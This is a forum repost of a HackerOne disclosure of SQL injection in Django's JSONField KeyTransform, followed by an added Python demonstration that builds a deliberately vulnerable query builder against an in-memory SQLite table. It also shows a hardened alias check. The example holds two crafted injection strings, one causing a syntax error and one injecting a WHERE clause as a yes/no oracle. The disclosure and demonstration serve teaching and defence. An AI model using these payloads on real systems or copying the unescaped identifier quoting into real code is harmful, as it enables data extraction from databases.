HackerOne Disclosed Reports - 2025-09-12


Severity: High | State: resolved

SQL injection in JSONField KeyTransform


Bug reported by Eyal Gabay, disclosed on September 12, 2025, 12:28 am   |   Weakness: SQL Injection

A vulnerability was discovered in the JSONField KeyTransform functionality of Django. The vulnerability allowed SQL injection attacks by crafting malicious user input for the .values() method. The vulnerability was demonstrated in the Django test suite, where a SQL syntax error was triggered by inputting a specifically crafted string.


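The report summary above does not show the SQL that was produced. The following is an added example, not code from the report or from Django, that models the mechanism a practitioner would expect behind a `.values("data__<key>")` injection: the JSON key is sent to the database as a bound parameter (safe), but the same lookup string is reused as the result column alias and wrapped in double quotes without escaping, so a key containing a quote terminates the identifier and the rest of the string becomes SQL. The table name `app_doc`, the `key_transform` function registered in SQLite, the sample rows and the `check_alias` allow-list are all constructed for this example. The first crafted key reproduces the syntax error the report mentions; the second shows why that error matters, by turning the alias into an attacker-controlled WHERE clause.

```python
import json
import re
import sqlite3

# Constructed sample rows standing in for a table behind a model with a
# JSONField named "data". Hypothetical data, not taken from the report.
SAMPLE_DOCS = [
    '{"name": "alice", "role": "user"}',
    '{"name": "bob", "role": "admin"}',
]


def key_transform(doc, key):
    # Stand-in for a JSON KeyTransform: look one key up in a JSON document.
    # The key arrives as a bound parameter, so its content cannot inject here.
    try:
        obj = json.loads(doc)
    except (TypeError, ValueError):
        return None
    value = obj.get(key) if isinstance(obj, dict) else None
    return json.dumps(value) if isinstance(value, (dict, list)) else value


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("key_transform", 2, key_transform)
    conn.execute("CREATE TABLE app_doc (id INTEGER PRIMARY KEY, data TEXT NOT NULL)")
    conn.executemany("INSERT INTO app_doc (data) VALUES (?)", [(d,) for d in SAMPLE_DOCS])
    return conn


def quote_name(name):
    # Identifier quoting that wraps in double quotes but does not escape
    # quotes already inside the name (assumed pre-fix behaviour).
    return '"%s"' % name


def build_values_sql(lookup):
    # Models values("data__<key>"): the key is a parameter, but the whole
    # lookup string is also used as the column alias (the injection point).
    field, _, key = lookup.partition("__")
    sql = "SELECT key_transform(%s, ?) AS %s FROM app_doc ORDER BY id" % (
        quote_name(field), quote_name(lookup))
    return sql, (key,)


def values_vulnerable(conn, lookup):
    sql, params = build_values_sql(lookup)
    return [row[0] for row in conn.execute(sql, params)]


# Allow-list check on aliases (constructed for this example): reject quotes,
# brackets, semicolons, whitespace and SQL comment markers before the name is
# ever pasted into the SQL string.
FORBIDDEN_ALIAS = re.compile(r"['`\"\]\[;\s]|--|/\*|\*/")


def check_alias(alias):
    if FORBIDDEN_ALIAS.search(alias):
        raise ValueError("Column aliases cannot contain whitespace characters, "
                         "quotation marks, semicolons, or SQL comments.")
    return alias


def values_hardened(conn, lookup):
    check_alias(lookup)
    return values_vulnerable(conn, lookup)


def attempt(conn, fn, lookup):
    # Run one lookup and report what happened instead of raising.
    try:
        return "ok", fn(conn, lookup)
    except sqlite3.OperationalError as exc:
        return "sql_error", str(exc)
    except ValueError as exc:
        return "rejected", str(exc)


# A lone quote unbalances the alias: the statement no longer parses.
SYNTAX_ERROR_LOOKUP = 'data__x"'
# Closing the alias early and commenting out the tail gives the attacker the
# FROM/WHERE clause; row count then leaks whether an admin document exists.
ORACLE_LOOKUP = "data__x\" FROM app_doc WHERE key_transform(data, 'role') = 'admin' --"

if __name__ == "__main__":
    conn = make_db()
    for lookup in ("data__name", SYNTAX_ERROR_LOOKUP, ORACLE_LOOKUP):
        print(repr(lookup))
        print("  vulnerable:", attempt(conn, values_vulnerable, lookup))
        print("  hardened:  ", attempt(conn, values_hardened, lookup))
```

The legitimate lookup returns both names through either path. Against the vulnerable builder, the first crafted key fails with a syntax error from the database, which is the symptom the report describes, while the second runs cleanly and returns exactly one row, so an attacker who controls the key can ask yes/no questions of the table even though the selected value itself is NULL. The hardened path rejects both crafted keys in Python before any SQL is built; parameterising the JSON path alone is not enough when the same string also reaches an identifier position.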

Messages In This Thread
HackerOne disclosed reports - 2025-09-12 - by hashXploiter - 09-13-2025, 12:30 PM


